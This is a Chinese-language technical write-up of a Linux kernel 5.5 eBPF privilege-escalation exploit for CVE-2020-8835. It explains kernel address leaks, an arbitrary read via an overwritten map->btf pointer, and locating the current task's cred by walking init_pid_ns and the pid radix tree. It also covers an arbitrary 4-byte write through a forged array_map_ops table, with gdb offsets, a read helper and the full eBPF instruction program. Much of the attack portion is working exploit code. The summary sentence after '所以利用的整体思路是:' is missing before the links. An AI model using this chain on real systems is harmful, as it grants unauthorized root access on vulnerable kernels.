该漏洞分析和利用思路作者已经公开,并且也有大佬公开了利用(见参考链接),所以本文就不再对漏洞原理进行分析,主要是对通过任意读写来提权的思路进行补充和分析。
环境和exp在附件中,内核版本下载:https://github.com/torvalds/linux/archive/v5.5.tar.gz
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,key_size,value_size,max_entries,0);
key_size:表示索引的大小范围,key_size=sizeof(int)=4.
value_size:表示map数组每个元素的大小范围,可以任意,只要控制在一个合理的范围
max_entries:表示map数组的大小,编写利用时将其设为1
bpf_create_map 创建的是一整个bpf_array结构,我们传入的数据放在value[] 处
/*
 * Kernel excerpt: array-map container. The generic bpf_map header is the
 * first member; the element storage follows in the trailing union.
 */
struct bpf_array {
    struct bpf_map map;
    u32 elem_size;
    u32 index_mask;
    struct bpf_array_aux *aux;
    union {
        char value[]; /* <--- elem: the data passed in from user space lives here */
        void *ptrs[];
        void *pptrs[];
    };
}
value[]在bpf_array整个结构的偏移为0x110,所以&value[0]-0x110即为bpf_array结构的起始地址,而bpf_map是bpf_array的第一个成员,因此这也是bpf_map结构的地址
/*
 * Kernel excerpt (abridged by the article): generic BPF map header.
 * ops is the first member, i.e. it sits at offset 0 of the structure.
 */
struct bpf_map {
    const struct bpf_map_ops *ops;
    struct bpf_map *inner_map_meta;
    void *security;
    enum bpf_map_type map_type;
    /* ... remaining fields omitted in this excerpt ... */
    u64 writecnt;
}
bpf_map 有一个const struct bpf_map_ops *ops; 字段,当我们创建的map是BPF_MAP_TYPE_ARRAY 的时候保存的是array_map_ops, array_map_ops 是一个全局变量,可以用于泄露内核地址
&exp_elem[0]-0x110+0xc0(wait_list)处保存着指向自身的地址,用于泄露exp_elem的地址
(gdb) p/x &(*(struct bpf_array *)0x0)->map.freeze_mutex.wait_list $9 = 0xc0
通过BPF_OBJ_GET_INFO_BY_FD 命令进行任意读,BPF_OBJ_GET_INFO_BY_FD 会调用bpf_obj_get_info_by_fd:
case BPF_OBJ_GET_INFO_BY_FD: err = bpf_obj_get_info_by_fd(&attr, uattr);
#define BPF_OBJ_GET_INFO_BY_FD_LAST_FIELD info.info static int bpf_obj_get_info_by_fd(const union bpf_attr *attr, union bpf_attr __user *uattr) { int ufd = attr->info.bpf_fd; struct fd f; int err; if (CHECK_ATTR(BPF_OBJ_GET_INFO_BY_FD)) return -EINVAL; f = fdget(ufd); if (!f.file) return -EBADFD; if (f.file->f_op == &bpf_prog_fops) err = bpf_prog_get_info_by_fd(f.file->private_data, attr, uattr); else if (f.file->f_op == &bpf_map_fops) err = bpf_map_get_info_by_fd(f.file->private_data, attr, uattr); ……
之后调用bpf_map_get_info_by_fd:
/*
 * Kernel excerpt: fill a struct bpf_map_info from the given map and copy at
 * most info_len bytes of it to the user buffer named by attr->info.info.
 *
 * Returns 0 on success, the error from bpf_check_uarg_tail_zero() or
 * bpf_map_offload_info_fill(), or -EFAULT if the copy to user space fails.
 */
static int bpf_map_get_info_by_fd(struct bpf_map *map,
                                  const union bpf_attr *attr,
                                  union bpf_attr __user *uattr)
{
    struct bpf_map_info __user *uinfo = u64_to_user_ptr(attr->info.info);
    struct bpf_map_info info = {};
    u32 info_len = attr->info.info_len;
    int err;

    err = bpf_check_uarg_tail_zero(uinfo, sizeof(info), info_len);
    if (err)
        return err;
    info_len = min_t(u32, sizeof(info), info_len);

    info.type = map->map_type;
    info.id = map->id;
    info.key_size = map->key_size;
    info.value_size = map->value_size;
    info.max_entries = map->max_entries;
    info.map_flags = map->map_flags;
    memcpy(info.name, map->name, sizeof(map->name));

    if (map->btf) {
        /*
         * Exploit note: overwriting map->btf turns this into an arbitrary
         * read. btf_id() returns btf->id, and id sits at offset 0x58 of
         * struct btf (gdb: &((struct btf *)0)->id == 0x58).
         */
        info.btf_id = btf_id(map->btf);
        info.btf_key_type_id = map->btf_key_type_id;
        info.btf_value_type_id = map->btf_value_type_id;
    }

    if (bpf_map_is_dev_bound(map)) {
        err = bpf_map_offload_info_fill(&info, map);
        if (err)
            return err;
    }

    /* info is copied out to user space here, which is what leaks the value. */
    if (copy_to_user(uinfo, &info, info_len) ||
        put_user(info_len, &uattr->info.info_len))
        return -EFAULT;

    return 0;
}
u32 btf_id(const struct btf *btf) { return btf->id; } (gdb) p/x &(*(struct btf*)0)->id #获取id在btf结构中的偏移 $56 = 0x58 (gdb) p/x &(*(struct bpf_map_info*)0)->btf_id #获取btf_id在bpf_map_info中偏移 $57 = 0x40
所以只需要修改map->btf为target_addr-0x58,就可以泄露到用户态info中,泄漏的信息在struct bpf_map_info 结构偏移0x40处,由于是u32类型,所以只能泄露4个字节。
利用代码如下:
/*
 * Arbitrary-read helper: issue BPF_OBJ_GET_INFO_BY_FD on mapfd and return the
 * 32-bit value found at offset 0x40 of the returned info buffer (the btf_id
 * field of struct bpf_map_info).
 *
 * key, value: unused; kept so existing callers keep compiling. They used to
 *             be stored into attr.key / attr.value, but those designators
 *             name a different member of union bpf_attr and were overridden
 *             by the .info.* designators that followed, so they never
 *             reached the kernel.
 * mapfd:      file descriptor of the map to query.
 * info:       caller-supplied buffer receiving the map info; info_len is
 *             passed as 0x100, so the buffer should be at least that large.
 *
 * Returns the u32 at info + 0x40, or 0 if the syscall fails, so that stale
 * buffer contents are never reported as a fresh read.
 */
static uint32_t bpf_map_get_info_by_fd(uint64_t key, void *value, int mapfd, void *info)
{
    union bpf_attr attr = {
        .info.bpf_fd = mapfd,
        .info.info_len = 0x100,
        .info.info = (__u64)info,
    };

    (void)key;
    (void)value;

    if (syscall(__NR_bpf, BPF_OBJ_GET_INFO_BY_FD, &attr, sizeof(attr)) < 0)
        return 0;

    /* 0x40 is the offset of btf_id inside struct bpf_map_info. */
    return *(uint32_t *)((char *)info + 0x40);
}
ksymtab 保存init_pid_ns结构的偏移,init_pid_ns字符串的偏移 kstrtab 保存init_pid_ns的字符串 (gdb) p &__ksymtab_init_pid_ns $48 = (<data variable, no debug info> *) 0xffffffff822f2578 (gdb) x/2wx 0xffffffff822f2578 0xffffffff822f2578: 0x001527c8 0x0000a1f9 (gdb) x/10s 0xffffffff822f257c+0xa1f9 0xffffffff822fc775 <__kstrtab_init_pid_ns>: "init_pid_ns" 0xffffffff822fc781 <__kstrtabns_kernel_param_unlock>: "" (gdb) x/10gx 0xffffffff822f2578+0x001527c8 0xffffffff82444d40 <init_pid_ns>: 0x0000000000000002 0x0080000400000000 0xffffffff82444d50 <init_pid_ns+16>: 0xffff88801e469242 0x0000006f00000000
所以我们通过搜索"init_pid_ns" 字符串可以得到kstrtab_init_pid_ns的地址,之后再通过搜索匹配 地址+该地址上四个字节(表示偏移)是否等于kstrtab_init_pid_ns的地址 来判断是否为ksymtab_init_pid_ns,此时找到的地址为ksymtab_init_pid_ns+4, 减去4就是ksymtab_init_pid_ns,上面有init_pid_ns结构的偏移,与ksymtab_init_pid_ns地址相加就可以得到init_pid_ns结构的地址。
之后通过pid 和 init_pid_ns查找对应pid的task_struct,这里其实就是要理清内核的查找过程,在写利用的时候模拟走一遍。最后找到task_struct中cred位置。
内核是通过find_task_by_pid_ns函数实现查找过程的:
/*
 * Kernel excerpt: look up the task with pid number nr in namespace ns.
 * Resolves nr to a struct pid via find_pid_ns(), then to a task_struct via
 * pid_task(..., PIDTYPE_PID).
 */
struct task_struct *find_task_by_pid_ns(pid_t nr, struct pid_namespace *ns)
{
    RCU_LOCKDEP_WARN(!rcu_read_lock_held(),
                     "find_task_by_pid_ns() needs rcu_read_lock() protection");
    return pid_task(find_pid_ns(nr, ns), PIDTYPE_PID);
}
nr 为当前进程的pid,ns 为init_pid_ns结构地址,我们需要的是idr字段的内容
/* Kernel excerpt: resolve pid number nr through the namespace's idr. */
struct pid *find_pid_ns(int nr, struct pid_namespace *ns)
{
    return idr_find(&ns->idr, nr);
}
lib/idr.c:
/*
 * Kernel excerpt: look up id in the idr. The radix-tree index used is
 * id - idr->idr_base, and the tree root is idr->idr_rt.
 */
void *idr_find(const struct idr *idr, unsigned long id)
{
    return radix_tree_lookup(&idr->idr_rt, id - idr->idr_base);
}
需要获取&idr->idr_rt 和 idr->idr_base
lib/radix-tree.c:
/*
 * Kernel excerpt: thin wrapper around __radix_tree_lookup() that does not
 * ask for the parent node or slot pointer (both passed as NULL).
 */
void *radix_tree_lookup(const struct radix_tree_root *root, unsigned long index)
{
    return __radix_tree_lookup(root, index, NULL, NULL);
}
/*
 * Kernel excerpt: walk the radix tree from root down to the entry stored at
 * index.
 *
 * root:  tree root.
 * index: key to look up.
 * nodep: if non-NULL, receives the last parent node visited.
 * slotp: if non-NULL, receives the address of the slot holding the result.
 *
 * Returns the entry found, or NULL when index is greater than maxindex.
 */
void *__radix_tree_lookup(const struct radix_tree_root *root,
                          unsigned long index,
                          struct radix_tree_node **nodep,
                          void __rcu ***slotp)
{
    struct radix_tree_node *node, *parent;
    unsigned long maxindex;
    void __rcu **slot;

restart:
    parent = NULL;
    slot = (void __rcu **)&root->xa_head;
    /* Per the article: this loads the value of root->xa_head into node. */
    radix_tree_load_root(root, &node, &maxindex);
    if (index > maxindex)
        return NULL;

    while (radix_tree_is_internal_node(node)) {
        unsigned offset;

        /* Per the article: parent = node & 0xfffffffffffffffd (tag bit cleared). */
        parent = entry_to_node(node);
        /* Descend one level toward the entry for index; node is updated. */
        offset = radix_tree_descend(parent, &node, index);
        slot = parent->slots + offset;
        if (node == RADIX_TREE_RETRY)
            goto restart;
        /* shift == 0: stop descending; node now holds the looked-up entry. */
        if (parent->shift == 0)
            break;
    }

    if (nodep)
        *nodep = parent;
    if (slotp)
        *slotp = slot;
    return node;
}
重点看radix_tree_descend函数实现:
RADIX_TREE_MAP_MASK : 0x3f
/*
 * Kernel excerpt: pick the child of parent that covers index.
 * Stores the child entry in *nodep and returns its slot offset.
 */
static unsigned int radix_tree_descend(const struct radix_tree_node *parent,
                                       struct radix_tree_node **nodep,
                                       unsigned long index)
{
    /* Slot number = (index >> parent->shift) masked with 0x3f. */
    unsigned int offset = (index >> parent->shift) & RADIX_TREE_MAP_MASK;
    /* parent->slots[offset] becomes the next node to visit. */
    void __rcu **entry = rcu_dereference_raw(parent->slots[offset]);

    *nodep = (void *)entry;
    return offset;
}
radix_tree_node的结构如下:
#define radix_tree_node xa_node struct xa_node { unsigned char shift; /* Bits remaining in each slot */ unsigned char offset; /* Slot offset in parent */ unsigned char count; /* Total entry count */ unsigned char nr_values; /* Value entry count */ struct xa_node __rcu *parent; /* NULL at top of tree */ struct xarray *array; /* The array we belong to */ union { struct list_head private_list; /* For tree user */ struct rcu_head rcu_head; /* Used when freeing node */ }; void __rcu *slots[XA_CHUNK_SIZE]; union { unsigned long tags[XA_MAX_MARKS][XA_MARK_LONGS]; unsigned long marks[XA_MAX_MARKS][XA_MARK_LONGS]; }; };
获得当前进程的node后就可以通过pid_task获取相应的task_struct:
/* Kernel excerpt: kinds of id a struct pid can stand for; PIDTYPE_PID is 0. */
enum pid_type {
    PIDTYPE_PID,
    PIDTYPE_TGID,
    PIDTYPE_PGID,
    PIDTYPE_SID,
    PIDTYPE_MAX,
};
type 为PIDTYPE_PID, 值为0
/* hlist_entry() is container_of(): member pointer -> enclosing structure. */
#define hlist_entry(ptr, type, member) container_of(ptr,type,member)
/*
 * Kernel excerpt: return the task attached to pid for the given pid type,
 * or NULL when pid is NULL or its tasks[type] list is empty.
 */
struct task_struct *pid_task(struct pid *pid, enum pid_type type)
{
    struct task_struct *result = NULL;
    if (pid) {
        struct hlist_node *first;
        /* Read the first entry of pid->tasks[type] (tasks[0] for PIDTYPE_PID). */
        first = rcu_dereference_check(hlist_first_rcu(&pid->tasks[type]),
                                      lockdep_tasklist_lock_is_held());
        /*
         * first is the address of the task's pid_links[type] member, so
         * hlist_entry() steps back from it to the start of the task_struct.
         */
        if (first)
            result = hlist_entry(first, struct task_struct, pid_links[(type)]);
    }
    return result;
}
相关结构字段的偏移:
(gdb) p/x &(*(struct task_struct *)0)->pid_links[0] $8 = 0x500 (gdb) p/x &(*(struct pid*)0x0)->tasks[0] $10 = 0x8
在exp_elem上填充伪造的array_map_ops,伪造的array_map_ops中将map_push_elem 填充为map_get_next_key ,这样调用map_push_elem时就会调用map_get_next_key ,并将&exp_elem[0]的地址覆盖到exp_map[0],同时要修改 map 的一些字段绕过一些检查
spin_lock_off = 0
max_entries = 0xffff ffff // 写入的index不能满足(index >= array->map.max_entries),否则只会执行 *next = 0 而不是 *next = index + 1,所以将max_entries改成0xffff ffff
map_type = BPF_MAP_TYPE_STACK // map 的类型是BPF_MAP_TYPE_QUEUE或者BPF_MAP_TYPE_STACK时,map_update_elem 会调用map_push_elem
最后调用bpf_update_elem任意写内存
bpf_update_elem->map_update_elem(mapfd, &key, &value, flags) -> map_push_elem(被填充成 map_get_next_key ) ->array_map_get_next_key
/*
 * Kernel excerpt: compute the key that follows *key in an array map.
 *
 * map:      the array map (embedded in a struct bpf_array).
 * key:      pointer to the current u32 index, or NULL (treated as U32_MAX).
 * next_key: receives the next index as a u32.
 *
 * Returns 0 after writing *next_key, or -ENOENT when key is the last index.
 */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
    struct bpf_array *array = container_of(map, struct bpf_array, map);
    u32 index = key ? *(u32 *)key : U32_MAX;
    u32 *next = (u32 *)next_key;

    /* Index at or beyond max_entries: the next key is reported as 0. */
    if (index >= array->map.max_entries) {
        *next = 0;
        return 0;
    }

    if (index == array->map.max_entries - 1)
        return -ENOENT;

    /* Otherwise a 32-bit store of index + 1 goes through next_key. */
    *next = index + 1;
    return 0;
}
map_push_elem 的参数是value 和 uattr 的 flags, 分别对应array_map_get_next_key 的 key 和 next_key 参数,之后有index = value[0],next = flags , 最终效果是 *(u32 *)flags = value[0]+1(因此value[0]要填"想写入的值-1",flags填目标地址),这里index 和 next 都是 u32 类型, 所以可以任意地址写 4个byte。
执行的bpf_insn注释:
/*
 * eBPF program used by the exploit. First part: range checks on r8 (a value
 * taken from ctrl_map). Second part: use r8 as an offset to step back from
 * the exp_map element to the map header, leak two header fields into
 * ctrl_map, and, when op == 1, overwrite header fields of exp_map.
 */
struct bpf_insn my_prog[] = {
    //-------- ctrl_mapfd
    BPF_LD_MAP_FD(BPF_REG_9,ctrl_mapfd),
    BPF_MAP_GET(0,BPF_REG_8), // macro defined elsewhere; presumably loads ctrl_map[0] into r8 - TODO confirm
    BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), /* r_dst = (r0) */
    BPF_LD_IMM64(BPF_REG_2,0x4000000000),
    BPF_LD_IMM64(BPF_REG_3,0x2000000000),
    BPF_LD_IMM64(BPF_REG_4,0xFFFFffff),
    BPF_LD_IMM64(BPF_REG_5,0x1),
    // Each of the four compares below, if taken, lands on the "r0 = 0; exit" pair.
    BPF_JMP_REG(BPF_JGT,BPF_REG_8,BPF_REG_2,5),
    BPF_JMP_REG(BPF_JLT,BPF_REG_8,BPF_REG_3,4),
    BPF_JMP32_REG(BPF_JGT,BPF_REG_8,BPF_REG_4,3),
    BPF_JMP32_REG(BPF_JLT,BPF_REG_8,BPF_REG_5,2),
    BPF_ALU64_REG(BPF_AND,BPF_REG_8,BPF_REG_4),
    BPF_JMP_IMM(BPF_JA, 0, 0, 2), // skip the early exit
    BPF_MOV64_IMM(BPF_REG_0,0x0),
    BPF_EXIT_INSN(),
    //-------- exp_mapfd
    BPF_LD_MAP_FD(BPF_REG_9,exp_mapfd),
    BPF_MAP_GET_ADDR(0,BPF_REG_7), // macro defined elsewhere; presumably r7 = &exp_elem[0] - TODO confirm
    BPF_ALU64_REG(BPF_SUB,BPF_REG_7,BPF_REG_8), // r7 = r7 - r8; per the author r8 is 0x110 here, so r7 = &exp_elem[0]-0x110
    BPF_LDX_MEM(BPF_DW,BPF_REG_0,BPF_REG_7,0), // r0 = *(&exp_elem[0]-0x110), i.e. the array_map_ops address
    BPF_STX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,0x10), // leak it: store at r6+0x10
    BPF_LDX_MEM(BPF_DW,BPF_REG_0,BPF_REG_7,0xc0), // r0 = *(&exp_elem[0]-0x110+0xc0), the wait_list field
    BPF_STX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,0x18), // leak it at r6+0x18; wait_list points to itself, so this reveals where exp_map lives
    // r0 = wait_list address + 0x50 = map base + 0xc0 + 0x50 = map base + 0x110 = &exp_elem[0].
    // Same value r7 had before the subtraction, but r0 is scalar data read from the map
    // while r7 is a pointer, and a pointer may not be written into a map.
    BPF_ALU64_IMM(BPF_ADD,BPF_REG_0,0x50),
    // &ctrl[0]+0x8 -> op
    BPF_LDX_MEM(BPF_DW,BPF_REG_8,BPF_REG_6,0x8), // r8 = op
    BPF_JMP_IMM(BPF_JNE, BPF_REG_8, 1, 4), // op != 1: skip the four stores below
    BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_0,0), // *(map base) = &exp_elem[0]: the ops pointer now points at the fake ops table
    BPF_ST_MEM(BPF_W,BPF_REG_7,0x18,BPF_MAP_TYPE_STACK), // map type
    BPF_ST_MEM(BPF_W,BPF_REG_7,0x24,-1), // max_entries = 0xffffffff
    BPF_ST_MEM(BPF_W,BPF_REG_7,0x2c,0x0), // lock_off (spin_lock_off) = 0
    BPF_MOV64_IMM(BPF_REG_0,0x0),
    BPF_EXIT_INSN(),
};
所以利用的整体思路是:
https://www.thezdi.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification
https://www.anquanke.com/post/id/203416
https://github.com/rtfingc/cve-repo/tree/master/0x04-pwn2own-ebpf-jmp32-cve-2020-8835
https://biscuitos.github.io/blog/RADIX-TREE___radix_tree_lookup/
http://sourcelink.top/2019/09/26/linux-kernel-radix-tree-analysis/